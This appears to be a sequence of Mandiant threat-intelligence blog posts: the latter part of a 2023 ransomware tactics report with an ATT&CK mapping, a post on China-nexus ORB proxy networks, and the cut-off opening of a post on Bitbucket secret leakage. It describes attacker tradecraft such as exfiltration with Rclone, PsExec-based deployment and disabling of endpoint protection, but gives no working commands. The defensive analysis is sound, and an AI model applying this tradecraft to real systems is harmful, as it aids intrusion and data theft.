• Mandiant commonly identified evidence of threat actors using keyword searches to target sensitive files for theft. These keywords varied across intrusions, but were generally related to topics such as general business operations, financial documents, accounting, non-disclosure agreements, confidential information, and credentials or credential stores.
• In a small number of cases, threat actors used custom data exfiltration tools to steal data from a victim's environment. For example, we observed a threat actor use EXMATTER alongside LOCKBIT.BLACK and a separate threat actor use EXBYTE in a case where BLACKBYTE ransomware was later deployed. In another case where an unknown ransomware was deployed, the threat actor used POWERLIFT to exfiltrate data related to the organization's financial operations and other confidential information.
• Threat actors most often used common publicly available tools and utilities to exfiltrate data from victim environments. Other common exfiltration mechanisms included files being transferred using an remote access tool, direct upload to cloud file storage via web browser, or the creation of email forwarding rules. 
  • We observed Rclone in approximately 30% of intrusions where data theft was confirmed or was suspected. Rclone was used to exfiltrate data to various destinations, including commercial cloud file storage services and attacker-controlled infrastructure. Other data synchronization tools used in this way include MEGASync and restic. 
  • FileZilla and/or WinSCP were used in the vast majority of cases where attackers exfiltrated data using an FTP client, although PuTTY (and/or Solar-PuTTY) were also used in a small number of cases. 
• At an ALPHV incident, multiple days after ransomware deployment, the threat actor created a mailtransport rule to BCC all inbound emails from the exchange server to an external email address. This may have been an attempt to exfiltrate additional sensitive information from the victim environment or to track their incident response and recovery efforts.

Ransomware Deployment

Threat actors have used diverse tactics to deploy ransomware payloads across victim environments. The most frequently observed methods include manual execution of ransomware payloads by threat actors who have interactive access to hosts via RDP or SSH and the use of PsExec with and without the use of pre-built deployment scripts. Notably, the PsExec utility was used in nearly 40% of the analyzed ransomware intrusions.

• The mechanism used to deliver preliminary ransomware payloads into a victim environment is often not identified; however, commonly observed mechanisms include the threat actors uploading via an installed remote access tool, or downloading from an actor-controlled SFTP server or a public file-sharing site, such as temp.sh.
• Threat actors commonly distribute and execute ransomware binaries using built-in commands, most often using PowerShell or batch scripts in tandem with scheduled tasks, Group Policy (GPOs), and/or the common administrative utility PsExec. The scripts using these types of commands to deploy ransomware may not always be detected or forensically recovered, as there are many common mechanisms to enable their execution in memory. 
  • We observed PowerShell used in various ways to enable ransomware execution, including its use for manual execution in an active PowerShell sessions (REDBIKE), injecting ransomware into another running process (CRYTOX), initiating a sequence of loaders ultimately leading to a ransomware payload (MALLOX), or more simply to execute ransomware on hosts across a network using PsExec (RHYSIDA).
  • Although scheduled tasks remained the most common persistence mechanism used to manage ransomware execution, in some rare cases, threat actors used other methods for this same purpose. These methods included the use of Bitsadmin jobs and registry Run keys, both of which were employed by actors deploying BASTA ransomware at separate intrusions.
• In approximately 20% of all ransomware intrusions during 2023, threat actors manually executed ransomware on hosts while logged in interactively via SSH, RDP, or a remote management tool. Manual execution of ransomware payloads occurred disproportionately in cases where a virtualization hypervisor such as ESXi or Hyper-V was targeted for encryption. 
  • We observed threat actors deploying ALPHV, BLACKBYTE, RHYSIDA, and LOCKBIT manually execute ransomware on ESXi hypervisors. In one case, the threat actor manually deployed ALPHV to multiple Hyper-V servers in an intrusion where they otherwise deployed ransomware using Group Policy. 
  • We observed threat actors deploying LOKILOCKER, REDBIKE, STOP, MEDUSALOCKER, GLOBEIMPOSTER, AGENDA, BASTA, ALPHV, WHITERABBIT, LOCKBIT, and PLAYCRYPT manually execute ransomware on some or all hosts impacted at intrusions. In one notable case, a threat actor deploying LOCKBIT manually executed their ransomware on a host 30 minutes prior to automated deployment via batch scripts, presumably as a test of the network's defenses. 

Anti-Detection and Analysis Tactics

Threat actors may take additional steps to ensure their ransomware can execute unabated and that their efforts cannot easily be undone by the victim. These actions may include disabling and deleting backups, disabling security software, clearing logs, and stopping processes and services that may interfere with file encryption.

• Threat actors used various methods to disable or tamper with Windows Defender or other endpoint protection software. 
  • We observed threat actors use multiple publicly available tools to tamper with endpoint protection software prior to ransomware deployment, such as PrivacySexy, dControl, and IObit Unlocker.
  • Threat actors regularly leveraged simple built-in commands or custom scripts to disable or tamper with endpoint protection software. This has commonly included the use of simple batch scripts, PowerShell commands and/or scripts, and the Set-MpPreference PowerShell cmdlet.
  • We observed threat actors subvert victim organizations' administrative software in multiple ways including by adding malicious files to endpoint protection exclusion lists and altering Group Policy Objects (GPOs) and Microsoft Intune configurations to disable endpoint protection software.
• In their attempts to hinder forensic analysis and ransomware recovery efforts, threat actors associated with nearly every major ransomware brand cleared local Windows event logs and/or deleted volume shadow copies on impacted systems; observed ransomware families across these many cases included PHOBOS, CACTUS, RHYSIDA, BASTA, TRUECRYPT, LOCKBIT, ALPHV, PLAYCRYPT, MALLOX, BABUK, BABLOCK, REDBIKE, and AGENDA.

Tool Prevalence 

Throughout 2023, threat actors conducting ransomware intrusions continued to leverage a diverse set of tools, likely due to the variety of teams and individuals engaging in this activity. Despite these variations, a broad analysis of tool prevalence used across these attacks reveals a few clear trends. The most notable year-over-year trend is simply that many attackers have done very little to evolve their toolkits, and we continue to see many of the same common tools at similar rates in 2023 as we did across 2022. Despite this uniformity, there have been a few notable shifts in tool use, including a decrease in threat actor reliance on BEACON and a commensurate increase in their use of remote management tools.

• We continue to observe a decline in BEACON usage in ransomware operations following the same trend across 2022. A small number of threat actors have adopted other post-exploitation frameworks, such as SLIVER and BOLDBADGER; however, an increasing number appear to be shifting toward the use of legitimate remote access tools. 
  • We observed a 50% decrease in BEACON usage by actors deploying ransomware in 2023 compared to 2022, with it only being used in approximately 20% of intrusions. By contrast, BEACON was observed at roughly 40% and 60% of intrusions by actors deploying ransomware in 2022 and 2021, respectively.
• Threat actors have increased their reliance on remote management tools in ransomware operations. We observed legitimate remote access tools being used at approximately 41% of intrusions in 2023 compared to 23% of intrusions in 2022. Notably, in 2023, the percentage of intrusions where AnyDesk was used almost doubled.
  • Threat actors expanded the variety of legitimate remote management tools used in 2023. In 2023, we observed 14 different remote management tools used in intrusions, which was double the number observed in 2022. Newly observed remote management tools include RustDesk, LevelRMM, and eHorus. 
  • During 2023, in more than 15% of incidents threat actors brought more than one remote management utility into the victim environment, a slight increase of 3% from 2022. 
• While RaaS operations have offered custom data exfiltration tools, we have rarely directly observed these in ransomware intrusions. However, in 2023, we identified a small subset of intrusions leveraging custom tools to facilitate data exfiltration, including EXBYTE, POWERLIFT, and EXMATTER. 
• Threat actors continued to use many common tools at similar rates across 2022 and 2023, including network scanners, PsExec, and Rclone. 
  • We observed popular network scanning tools, including SoftPerfect Network Scanner, Advanced IP Scanner, and Advanced Port Scanner, in approximately half of all ransomware incidents. 
  • The prevalence of PsExec remains consistent at around 40% of intrusions, and threat actors used Rclone in around 20% of ransomware incidents. 

Outlook and Implications

Despite some apparent experimentation with extortion tactics, ranging from making stolen data more accessible to overtly aggressive techniques such as threats to swat hospitals, the TTPs used by threat actors during ransomware intrusions have remained largely consistent. The observed increasing reliance on legitimate tools likely reflects efforts by attackers to conceal their operations from detection mechanisms and reduce the time and resources required to develop and maintain custom tools. Similarly, while we still consistently see vulnerability exploitation as a popular method to gain initial access to a victim environment, threat actors more commonly relied on known vulnerabilities. This is a notable shift from the past when multiple major threat actors were deploying custom malware and acquiring zero-day exploits, although FIN11 continued to do so in incidents involving data theft without ransomware deployment. Recent evidence also suggests that threat actors associated with BASTA ransomware had access to a zero-day exploit but to support privilege escalation. It is plausible that some threat actors have chosen to invest in other aspects of the operation given the wide availability of other initial access methods that are typically less costly. 

Significant law enforcement actions against two of the most prolific RaaS groups, ALPHV and LOCKBIT, disrupted the ransomware ecosystem in late 2023 and early 2024. While the impact of these operations is yet to be fully understood, previous reactions to disruptive actions suggest that threat actors are resilient in the face of obstacles. However, we have observed at least some short term impacts, including ALPHV dropping out of the top three most prolific DLS, based on volume of posts in Q1 2024. Further, some new ransomware offerings, such as Ransomhub, are attempting to recruit affiliates that have been impacted by recent shutdowns or exit scams. Notably, this was a tactic employed by the Lockbit RaaS, as identified in the recent indictment of the actor ‘LockBitSupp’. We also continue to observe threat actors claiming to use multiple ransomware families simultaneously, providing them some level of stability to weather possible disruptions to RaaS offerings. In 2024, over 20 new DLS emerged, which underscores that threat actors have several alternatives to choose from if they wish to continue operations; notably, this is a pace that if continues, will outnumber the volume of new sites observed in 2023. Consequently, we expect that the threat actors impacted by recent actions will likely in time be able to recover and continue to engage in ransomware and extortion activity.

Read our Ransomware Protection and Containment Strategies paper for in-depth strategies to defend against ransomware. 

Technical Appendix MITRE ATT&CK Mapping

The following techniques were associated with ransomware incidents observed by Mandiant in 2023. Techniques that were commonly observed are highlighted in bold.

Resource Development

• T1583 Acquire Infrastructure
  • T1583.001 Domains
  • T1583.003 Virtual Private Server
  • T1583.008 Malvertising
• T1584 Compromise Infrastructure
• T1587 Develop Capabilities
  • T1587.002 Code Signing Certificates
  • T1587.003 Digital Certificates
• T1588 Obtain Capabilities
  • T1588.001 Malware
  • T1588.002 Tool
  • T1588.005 Exploits
  • T1588.004 Digital Certificates
• T1608 Stage Capabilities
  • T1608.001 Upload Malware
  • T1608.002 Upload Tool
  • T1608.003 Install Digital Certificate
  • T1608.006 SEO Poisoning
• T1650 Acquire Access

Initial Access

• T1078 Valid Accounts
  • T1078.004 Cloud Accounts
• T1133 External Remote Services
• T1189 Drive-by Compromise
• T1190 Exploit Public-Facing Application
• T1566 Phishing
  • T1566.001 Spearphishing Attachment
  • T1566.002 Spearphishing Link
  • T1566.004 Spearphishing Voice

Execution

• T1047 Windows Management Instrumentation
• T1053 Scheduled Task/Job
  • T1053.003 Cron
  • T1053.005 Scheduled Task
• T1059 Command and Scripting Interpreter
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1059.004 Unix Shell
  • T1059.005 Visual Basic
  • T1059.006 Python
• T1569.002 Service Execution
• T1204 User Execution

Persistence

• T1037 Boot or Logon Initialization Scripts
• T1053 Scheduled Task/Job
  • T1053.003 Cron
  • T1053.005 Scheduled Task
• T1078 Valid Accounts
  • T1078.002 Domain Accounts
  • T1078.003 Local Accounts
  • T1078.004 Cloud Accounts
• T1098 Account Manipulation
  • T1098.004 SSH Authorized Keys
  • T1098.005 Device Registration
• T1133 External Remote Services
• T1136 Create Account
  • T1136.001 Local Account
  • T1136.002 Domain Account
• T1505 Server Software Component
  • T1505.003 Web Shell
• T1543 Create or Modify System Process
  • T1543.002 Systemd Service
  • T1543.003 Windows Service
• T1546 Event Triggered Execution
  • T1546.003 Windows Management Instrumentation Event Subscription
  • T1546.012 Image File Execution Options Injection
• T1547 Boot or Logon Autostart Execution
  • T1547.001 Registry Run Keys / Startup Folder
  • T1547.004 Winlogon Helper DLL
  • T1547.009 Shortcut Modification
• T1556 Modify Authentication Process
  • T1556.006 Multi-Factor Authentication
• T1574 Hijack Execution Flow
  • T1574.011 Services Registry Permissions Weakness

Privilege Escalation

• T1037 Boot or Logon Initialization Scripts
• T1053 Scheduled Task/Job
  • T1053.003 Cron
  • T1053.005 Scheduled Task
  • T1055 Process Injection
• T1068 Exploitation for Privilege Escalation
• T1078 Valid Accounts
  • T1078.002 Domain Accounts
  • T1078.004 Cloud Accounts
• T1134 Access Token Manipulation
  • T1134.001 Token Impersonation/Theft
• T1484 Domain Policy Modification
  • T1484.001 Group Policy Modification
• T1543 Create or Modify System Process
  • T1543.002 Systemd Service
  • T1543.003 Windows Service
• T1546 Event Triggered Execution
  • T1546.003 Windows Management Instrumentation Event Subscription
  • T1546.012 Image File Execution Options Injection
• T1547 Boot or Logon Autostart Execution
  • T1547.001 Registry Run Keys / Startup Folder
  • T1547.004 Winlogon Helper DLL
  • T1547.009 Shortcut Modification
• T1548 Abuse Elevation Control Mechanism
  • T1548.002 Bypass User Account Control
• T1574 Hijack Execution Flow
  • T1574.011 Services Registry Permissions Weakness

Defense Evasion

• T1006 Direct Volume Access
• T1027 Obfuscated Files or Information
  • T1027.001 Binary Padding
  • T1027.002 Software Packing
  • T1027.004 Compile After Delivery
  • T1027.008 Stripped Payloads
  • T1027.009 Embedded Payloads
  • T1027.010 Command Obfuscation
• T1036 Masquerading
  • T1036.001 Invalid Code Signature
  • T1036.005 Match Legitimate Name or Location
• T1055 Process Injection
• T1070 Indicator Removal
  • T1070.001 Clear Windows Event Logs
  • T1070.004 File Deletion
  • T1070.005 Network Share Connection Removal
  • T1070.006 Timestomp
  • T1070.007 Clear Network Connection History and Configurations
  • T1070.008 Clear Mailbox Data
  • T1070.009 Clear Persistence
• T1078 Valid Accounts
  • T1078.002 Domain Accounts
  • T1078.003 Local Accounts
  • T1078.004 Cloud Accounts
• T1112 Modify Registry
• T1127 Trusted Developer Utilities Proxy Execution
  • T1127.001 MSBuild
• T1134 Access Token Manipulation
  • T1134.001 Token Impersonation/Theft
• T1140 Deobfuscate/Decode Files or Information
• T1202 Indirect Command Execution
• T1207 Rogue Domain Controller
• T1218 System Binary Proxy Execution
  • T1218.001 Compiled HTML File
  • T1218.005 Mshta
  • T1218.007 Msiexec
  • T1218.010 Regsvr32
  • T1218.011 Rundll32
  • T1218.014 MMC
• T1222 File and Directory Permissions Modification
  • T1222.001 Windows File and Directory Permissions Modification
  • T1222.002 Linux and Mac File and Directory Permissions Modification
• T1484 Domain Policy Modification
  • T1484.001 Group Policy Modification
• T1548 Abuse Elevation Control Mechanism
  • T1548.002 Bypass User Account Control
• T1550 Use Alternate Authentication Material
  • T1550.002 Pass the Hash
• T1553 Subvert Trust Controls
  • T1553.002 Code Signing
  • T1553.005 Mark-of-the-Web Bypass
• T1556 Modify Authentication Process
  • T1556.002 Password Filter DLL
  • T1556.003 Pluggable Authentication Modules
  • T1556.006 Multi-Factor Authentication
• T1562 Impair Defenses
  • T1562.001 Disable or Modify Tools
  • T1562.002 Disable Windows Event Logging
  • T1562.004 Disable or Modify System Firewall
  • T1562.010 Downgrade Attack
• T1564 Hide Artifacts
  • T1564.001 Hidden Files and Directories
  • T1564.003 Hidden Window
  • T1564.010 Process Argument Spoofing
• T1574 Hijack Execution Flow
  • T1574.011 Services Registry Permissions Weakness

Credential Access

• T1003 OS Credential Dumping
  • T1003.001 LSASS Memory
  • T1003.002 Security Account Manager
  • T1003.003 NTDS
  • T1003.006 DCSync
  • T1003.008 /etc/passwd and /etc/shadow
• T1110 Brute Force
  • T1110.001 Password Guessing
  • T1110.002 Password Cracking
  • T1110.004 Credential Stuffing
• T1111 Multi-Factor Authentication Interception
• T1187 Forced Authentication
• T1539 Steal Web Session Cookie
• T1552 Unsecured Credentials
  • T1552.001 Credentials In Files
  • T1552.002 Credentials in Registry
  • T1552.003 Bash History
  • T1552.004 Private Keys
• T1555 Credentials from Password Stores
  • T1555.003 Credentials from Web Browsers
  • T1555.004 Windows Credential Manager
  • T1555.005 Password Managers
• T1556 Modify Authentication Process
  • T1556.002 Password Filter DLL
  • T1556.003 Pluggable Authentication Modules
  • T1556.006 Multi-Factor Authentication
• T1558 Steal or Forge Kerberos Tickets
  • T1558.003 Kerberoasting
• T1621 Multi-Factor Authentication Request Generation

Discovery

• T1007 System Service Discovery
• T1012 Query Registry
• T1016 System Network Configuration Discovery
  • T1016.001 Internet Connection Discovery
• T1018 Remote System Discovery
• T1033 System Owner/User Discovery
• T1046 Network Service Discovery
• T1049 System Network Connections Discovery
• T1057 Process Discovery
• T1069 Permission Groups Discovery
  • T1069.001 Local Groups
  • T1069.002 Domain Groups
  • T1069.003 Cloud Groups
• T1082 System Information Discovery
• T1083 File and Directory Discovery
• T1087 Account Discovery
  • T1087.001 Local Account
  • T1087.002 Domain Account
  • T1087.004 Cloud Account
• T1135 Network Share Discovery
• T1201 Password Policy Discovery
• T1482 Domain Trust Discovery
• T1518 Software Discovery
  • T1518.001 Security Software Discovery
• T1615 Group Policy Discovery

Lateral Movement

• T1021 Remote Services
  • T1021.001 Remote Desktop Protocol
  • T1021.002 SMB/Windows Admin Shares
  • T1021.004 SSH
  • T1021.005 VNC
  • T1021.006 Windows Remote Management
  • T1021.007 Cloud Services
• T1219 Remote Access Software
• T1550 Use Alternate Authentication Material
  • T1550.002 Pass the Hash
• T1563 Remote Service Session Hijacking
  • T1563.002 RDP Hijacking
• T1570 Lateral Tool Transfer

Collection

• T1005 Data from Local System
• T1039 Data from Network Shared Drive
• T1074 Data Staged
  • T1074.001 Local Data Staging
• T1114 Email Collection
  • T1114.001 Local Email Collection
• T1115 Clipboard Data
• T1119 Automated Collection
• T1213 Data from Information Repositories
  • T1213.002 Sharepoint
  • T1213.003 Code Repositories
• T1560 Archive Collected Data
  • T1560.001 Archive via Utility
• T1602 Data from Configuration Repository
  • T1602.002 Network Device Configuration Dump

Command and Control

• T1071 Application Layer Protocol
  • T1071.001 Web Protocols
  • T1071.002 File Transfer Protocols
  • T1071.004 DNS
• T1090 Proxy
  • T1090.003 Multi-hop Proxy
• T1095 Non-Application Layer Protocol
• T1105 Ingress Tool Transfer
• T1219 Remote Access Software
• T1571 Non-Standard Port
• T1572 Protocol Tunneling
• T1573 Encrypted Channel
  • T1573.002 Asymmetric Cryptography

Exfiltration

• T1020 Automated Exfiltration
• T1041 Exfiltration Over C2 Channel
• T1048 Exfiltration Over Alternative Protocol
• T1567 Exfiltration Over Web Service
  • T1567.002 Exfiltration to Cloud Storage

Impact

• T1485 Data Destruction
• T1486 Data Encrypted for Impact
• T1489 Service Stop
• T1490 Inhibit System Recovery
• T1491 Defacement
  • T1491.001 Internal Defacement
  • T1491.002 External Defacement
• T1529 System Shutdown/Reboot
• T1531 Account Access Removal
• T1657 Financial Theft

Written by: Michael Raggi

 

Mandiant Intelligence is tracking a growing trend among China-nexus cyber espionage operations where advanced persistent threat (APT) actors utilize proxy networks known as “ORB networks” (operational relay box networks) to gain an advantage when conducting espionage operations. ORB networks are akin to botnets and are made up of virtual private servers (VPS), as well as compromised Internet of Things (IoT) devices, smart devices, and routers that are often end of life or unsupported by their manufacturers. Building networks of compromised devices allows ORB network administrators to easily grow the size of their ORB network with little effort and create a constantly evolving mesh network that can be used to conceal espionage operations. 

• By using these mesh networks to conduct espionage operations, actors can disguise external traffic between command and control (C2) infrastructure and victim environments including vulnerable edge devices that are being exploited via zero-day vulnerabilities. 
• These networks often use both rented VPS nodes in combination with malware designed to target routers so they can grow the number of devices capable of relaying traffic within compromised networks. 

Mandiant assesses with moderate confidence that this is an effort to raise the cost of defending an enterprise’s network and shift the advantage toward espionage operators by evading detection and complicating attribution. Mandiant believes that if network defenders can shift the current enterprise defense paradigm away from treating adversary infrastructure like indicators of compromise (IOCs) and instead toward tracking ORB networks like evolving entities akin to APT groups, enterprises can contend with the rising challenge of ORB networks in the threat landscape.

For even more on ORB networks, listen to our latest The Defender's Advantage podcast.

IOC Extinction and the Rise of ORB Networks

The cybersecurity industry has reported on the APT practice of ORB network usage in the past as well as on the functional implementation of these networks. Less discussed are the implications of broad ORB network usage by a multitude of China-nexus espionage actors, which has become more common over recent years. The following are three key points and paradigm shifting implications about ORB networks that require enterprise network defenders to adapt the way they think about China-nexus espionage actors:

• ORB networks undermine the idea of “Actor-Controlled Infrastructure”: ORB networks are infrastructure networks administered by independent entities, contractors, or administrators within the People's Republic of China (PRC). They are not controlled by a single APT actor. ORB networks create a network interface, administer a network of compromised nodes, and contract access to those networks to multiple APT actors that will use the ORB networks to carry out their own distinct espionage and reconnaissance. These networks are not controlled by APT actors using them, but rather are temporarily used by these APT actors often to deploy custom tooling more conventionally attributable to known China-nexus adversaries.
• ORB network infrastructure has a short lifespan and IOC extinction is accelerating: Based on Mandiant’s regular tracking of ORB networks, the lifespan of an IPv4 address associated with an ORB node can be in an ORB network for as few as 31 days. Each ORB network has different practices for cycling infrastructure as part of their ORB networks infrastructure. However, a competitive differentiator among ORB network contractors in China appears to be their ability to cycle significant percentages of their compromised or leased infrastructure on a monthly basis. Therefore, simply blocking infrastructure observed in association with ORB network behavior is not as effective as blocking C2 infrastructure would have been in the period between 2005 and 2016. As a result, IOC extinction is accelerating and the shelf life of network indicators is decreasing.
• Attributing espionage operations cannot rely on network infrastructure alone: From a defender’s perspective, the egress IP address observed in relation to an APT attack has for years been a key artifact used to research an intrusion's attribution. In the case of China-nexus attacks, attribution is growing both more challenging and more non-specific. Infrastructure or the compromised router device communicating with a victim environment may now be identifiable to a particular ORB network, while the actor using that ORB network to carry out the attack may be unclear and require investigation of the complex tools and tactics observed as part of an intrusion. These networks allow actors to egress from devices that have a geographic proximity to targeted enterprises, which allows traffic to blend in or otherwise not be anomalous when being reviewed by analysts or operational personnel making risk-based access decisions. One such example would be traffic from a residential ISP that is in the same geographic location as the target that is regularly used by employees and would be less likely to get picked up for manual review. The weaponization phase of the cyber kill chain now appears to be administered by third-party providers, complicating the definitive attribution of cyberattacks using network indicators and increasing the difficulty of detecting anomalous traffic.  

The Anatomy of an ORB Network

ORB networks are always made up of network infrastructure nodes. These nodes can be compromised routers, leased VPS devices, or often a mixture of both. While earlier commercial incarnations of ORB networks date back to 2016, the modern incarnation of networks like ORB1 / ORBWEAVER can be tracked back to at least 2020. The nodes in any given ORB network are usually distributed globally across the world and are not geographically specific to any one location. ORB network administrators rely on ASN providers in different parts of the world to reduce exposure or dependence on any one nation’s internet infrastructure. An example of global distribution of an ORB network can be seen as follows in what Mandiant tracks as ORB3 or SPACEHOP, a very active network leveraged by multiple China-nexus threat actors. The high volume of APT-related traffic through globally distributed nodes indicates that this network is utilized to target a wide array of geographic targets colocated in the geographies of observed exit nodes. Notably, this network maintains a robust volume of nodes in Europe, the Middle East, and the United States. These geographies have been observed as targets of APT15 and UNC2630 (a cluster of activity with suspected links to APT5) and have previously been observed using this network. This network also diversifies its nodes by registering VPS-based devices with multiple commercially available Autonomous System providers.

Figure 1: Country heatmap of ORB3 / SPACEHOP nodes 2023

Autonomous System

Percent of Observed SPACEHOP Nodes

Shenzhen Tencent Computer Systems Company Limited (CN)

7.73%

Hangzhou Alibaba Advertising Co.,Ltd. (CN)

4.55%

Tencent Building, Kejizhongyi Avenue (CN)

4.24%

OVH SAS (FR)

4.02%

Stark Industries Solutions Ltd (UK)

2.95%

BrainStorm Network, Inc (CA)

2.50%

TWC (US)

2.42%

Green Floid LLC (PL)

2.12%

Kaopu Cloud HK Limited (HK)

2.12%

AS-CHOOPA (US)

1.82%

Table 1: Top 10 Autonomous System providers and percent composition of ORB3 / SPACEHOP network ORB Network Classifications

Mandiant classifies ORB networks into two fundamental types. Networks can be provisioned networks, which are made up of commercially leased VPS space that are managed by ORB network administrators, or they can be non-provisioned networks, which are often made up of compromised and end-of-life router and IoT devices. It is also possible for an ORB network to be a hybrid network combining both leased VPS devices and compromised devices. Mandiant notes that it has observed both a wide diversity of China-nexus threat actors using each kind of ORB network. The type of threat actor organization does not appear to limit which type of network threat actors utilize, despite historic indications that military-related entities have preferred procured networks in the past. Alternatively, threat actors with a civilian intelligence background have proven more likely to utilize non-provisioned networks consisting of routers compromised by custom malware.

Provisioned Networks

Non-Provisioned Networks

Leased VPS devices via commercial services

Compromised routers and IoT devices

Actor administration of nodes

Actor augmentation of network through custom router-based payloads

Provisioned networks require actors to manage virtual images or operating systems on leased devices.

Many non-provisioned networks will use leased VPS devices as adversary-controlled operations servers (“ACOS nodes”)

Table 2: Characteristics of provisioned and non-provisioned ORB networks ORB Network Universal Anatomy

After continuous analysis of numerous ORB networks spanning years, Mandiant has designed a universal anatomy for analyzing and labeling ORB network components. This anatomy is intended to serve as a guide for enterprise defenders when identifying malicious ORB network node infrastructure. All networks that are identified will have a universal set of identifiable components. While the configuration of these components may differ between networks and the traversal path through an ORB network may appear different on a case by case basis, the following components are essential for an ORB network to function:

• Adversary Controlled Operations Server (“ACOS”): This is an adversary-controlled server used to administer nodes within an ORB network. 
• Relay Node: This is most commonly a leased VPS node at a major China or Hong Kong-based cloud provider. This node allows users of an ORB network to authenticate to the network and relay traffic through the larger traversal pool on ORB nodes.
• Traversal Nodes: These are the primary volume of nodes that make up an ORB network. These can be either provisioned or non-provisioned nodes and are used to relay traffic across an ORB network obfuscating the origin of network traffic. Some networks may utilize multiple types of traversal nodes or include multiple traversal layers.
• Exit/Staging Nodes: These are actor-controlled nodes often exhibiting the same characteristics as traversal nodes that are used to egress from an ORB network into a victim environment.
• Victim Server: The targeted victim’s infrastructure communicating with the ORB network node.

Figure 2: Diagram of the Universal Anatomy of an ORB network

Mandiant notes that the ACOS servers and relay nodes are most commonly hosted in PRC-affiliated and Hong Kong-based IP space. Analysts believe that by placing these critical servers behind the Great Firewall, ORB network administrators may limit their exposure to both legal and disruptive actions of targeted entities.

Examples of Active ORB Networks in the Wild ORB3 / SPACEHOP - Provisioned Network

A primary example of a provisioned ORB network leveraged in the wild by numerous APTs is a network tracked by Mandiant as ORB3 / SPACEHOP. This network consists of servers provisioned by a single entity operating in China. The network has facilitated network reconnaissance scanning and vulnerability exploitation conducted by China-nexus threat actors, including APT5 and APT15.

The infrastructure present in the ORB3 network represents a threat to entities that have historically been targeted by APT15 and APT5, including entities in North America, Europe, and the Middle East. Active since at least 2019, UNC2630 (with suspected links to APT5), used a known SPACEHOP node to exploit CVE-2022-27518 in late December 2022. The National Security Agency (NSA) linked exploitation of CVE-2022-27518 within the same time frame to APT5. 

This ORB network’s topography is rather flat when compared to more complex ORB networks. It leverages a relay server hosted in either Hong Kong or China by cloud providers and installs a C2 framework available on GitHub for the administration of downstream relay nodes. The relay nodes are often cloned Linux-based images, which are used to proxy malicious network traffic through the network to an exit node that communicates with targeted victim environments.

Figure 3: ORB3 / SPACEHOP network diagram

ORB2 FLORAHOX - Non-Provisioned Network

FLORAHOX is an example of both a non-provisioned and a hybrid ORB network. It is composed of an ACOS node, compromised network router and IOT devices, and leased VPS servers that interface with a customized TOR relay network layer. The network is used to proxy traffic from a source and relay it through a TOR network and several compromised router nodes to obfuscate the source of the traffic. It is believed to be used in cyber espionage campaigns by a diverse set of China-nexus threat actors.

The network appears to contain several subnetworks composed of compromised devices recruited by the router implant FLOWERWATER as well as other router-based payloads. Subnetworks are capable of being used in an overlapping manner to relay malicious traffic through the network segments. FLORAHOX appears to be multi-tenanted with several distinct router compromise payloads being used for the augmentation of the network and several APT threat actors leveraging the network. While it appears several actors may utilize the FLORAHOX network, China-nexus threat actors including clusters of activity publicly tracked as APT31 and Zirconium have been reported by multiple trusted third-party sources to utilize the network.

An additional tool that was determined to be a MIPS router tunneler payload (PETALTOWER) and related controller Bash scripts, which provide command-line inputs to the PETALTOWER payload (SHIMMERPICK), were identified in January 2023. The purpose of these tools appears to be providing a configuration for the traversal of the network and traversing the network of pre-existing FLORAHOX nodes based on command-line inputs.

ORB2 represents a more complicated design including the relay of traffic through TOR nodes, provisioned VPS servers, and different types of compromised routers including CISCO, ASUS, and Draytek end-of-life devices. The network embodies years of continual augmentation and several generations of distinct router-based payloads used simultaneously to recruit vulnerable devices into the FLORAHOX traversal node pool.

Figure 4: ORB2 / FLORAHOX network diagram

The Defender’s Dilemma 

The widespread adoption of ORB networks by China-nexus espionage actors introduces a new layer of complexity to defending enterprise environments from malicious infrastructure. Rather than earlier practices allowing for the outright blocking of adversary infrastructure, defenders must now consider:

• Temporality: What Infrastructure is part of the ORB network right now?
• Multiplicity of Adversaries: Which adversaries are using this ORB network and am I seeing one of them targeting my network?
• Ephemerality: How long is this infrastructure part of the ORB network being defended against and are changing characteristics of infrastructure indicative of new tactics?

Mandiant asserts that the best way to rise to the challenge posed by ORB networks is to stop tracking espionage C2 infrastructure as an inert indicator of compromise and start tracking it as an entity with distinct TTPs. We no longer operate in the world of “block and move on” where IPs are part of APT’s weaponization and C2 kill chain phase. Instead, infrastructure is a living artifact of an ORB network that is a distinct and evolving entity where the characteristics of IP infrastructure itself, including ports, services, and registration/hosting data, can be tracked as evolving behavior by the adversary administrator responsible for that ORB network.

By shifting awareness and our enterprise defender paradigm toward treating ORB networks like APTs instead of IOCs, defenders can begin to turn their dilemma into a defender’s advantage. 

Conclusion

Use of ORB networks to proxy traffic in a compromised network is not a new tactic, nor is it unique to China-nexus cyber espionage actors. However, its ubiquity that has evolved over the past four years now requires defenders to meet this challenge head on to keep pace with adversaries in the cyber espionage landscape. We have tracked China-nexus cyber espionage using these tactics as part of a broader evolution toward more purposeful, stealthy, and effective operations. In addition to wanting to be stealthy, actors want to increase the cost and analytical burden on defenders of enterprise environments. The rise of the ORB network industry in China points to long-term investments in equipping China-nexus cyber operators with more sophisticated tactics and tools that facilitate enterprise exploitation to achieve higher success rates in gaining and maintaining access to high-value networks. Whether defenders will rise to this challenge depends on enterprises applying the same deep tactical focus to tracking ORB networks as has been done for APTs over the last 15 years. Mandiant is equipped to provide enterprise defenders with the capability to meet this challenge and scale to overcome it.

Written by: Mark Swindle

 

While investigating recent exposures of Amazon Web Services (AWS) secrets, Mandiant identified a scenario in which client-specific secrets have been leaked from Atlassian's code repository tool, Bitbucket, and leveraged by threat actors to gain unauthorized access to AWS. This blog post illustrates how Bitbucket Secured Variables can be leaked in your pipeline and expose you to security breaches. 

Background

Bitbucket is a code hosting platform provided by Atlassian and is equipped with a built-in continuous integration and continuous delivery/deployment (CI/CD) service called Bitbucket Pipelines. Bitbucket Pipelines can be used to execute CI/CD use cases like deploying and maintaining resources in AWS. Bitbucket includes an administrative function called "Secured Variables" that allows administrators to store CI/CD secrets, such as AWS keys, directly in Bitbucket for easy reference by code libraries. 

CI/CD Secrets: CI/CD Secrets serve as the authentication and authorization backbone within CI/CD pipelines. They provide the credentials required for pipelines to interact with platforms like AWS, ensuring pipelines possess the appropriate permissions for their tasks. Secrets are often extremely powerful and are beloved by attackers because they present an opportunity for direct, unabated access to an environment. Maintaining confidentiality of secrets while balancing ease of use by developers is a constant struggle in securing CI/CD pipelines. 

Bitbucket Secured Variables: Bitbucket provides a way to store variables so developers can quickly reference them when writing code. Additionally, Bitbucket offers an option to declare a variable as a "secured variable" for any data that is sensitive. A secured variable is designed such that, once its value is set by an administrator, it can no longer be read in plain text. This structure allows developers to make quick calls to secret variables without exposing their values anywhere in Bitbucket. Unless…

